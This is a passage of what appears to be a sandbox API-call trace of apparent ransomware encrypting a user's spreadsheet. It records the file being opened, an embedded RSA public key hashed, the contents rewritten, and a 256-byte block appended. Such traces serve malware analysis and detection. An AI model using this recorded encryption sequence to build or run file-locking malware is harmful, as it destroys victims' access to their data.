ftLastWriteTime.dwLowDateTime=0x8cca3200, ftLastWriteTime.dwHighDateTime=0x1d89142, nFileSizeHigh=0x0, nFileSizeLow=0x5f00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RUCPVLyvfQF00IxB1.xlsx", cAlternateFileName="RUCPVL~1.XLS")) returned 1 [0189.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2cc8 [0189.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0189.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2cc8 | out: hHeap=0x2c0000) returned 1 [0189.416] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\RUCPVLyvfQF00IxB1.xlsx") returned=".xlsx" [0189.417] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RUCPVLyvfQF00IxB1.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\rucpvlyvfqf00ixb1.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.418] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=24320) returned 1 [0189.418] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.422] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5eda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.422] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.425] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.425] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x5f00, lpOverlapped=0x0) returned 1 [0189.426] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.426] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.426] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.426] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.427] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.427] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.428] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.428] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.428] GetLastError () returned 0x0 [0189.428] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.428] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.428] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.428] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.428] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5f00) returned 0x2ae5ea0 [0189.429] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2cc8 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2d10 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.430] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db68 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0db50 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.433] GetCurrentThreadId () returned 0x5d8 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4578 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.433] GetCurrentThreadId () returned 0x5d8 [0189.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db68 [0189.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbc8 [0189.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0189.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbe0 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db80 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db50 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2d10 | out: hHeap=0x2c0000) returned 1 [0189.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.445] WriteFile (in: hFile=0x584, lpBuffer=0x2ae5ea0*, nNumberOfBytesToWrite=0x5efb, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae5ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x5efb, lpOverlapped=0x0) returned 1 [0189.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ea0 | out: hHeap=0x2c0000) returned 1 [0189.446] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.446] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.447] HeapFree (in: hHeap=0x2c0000, 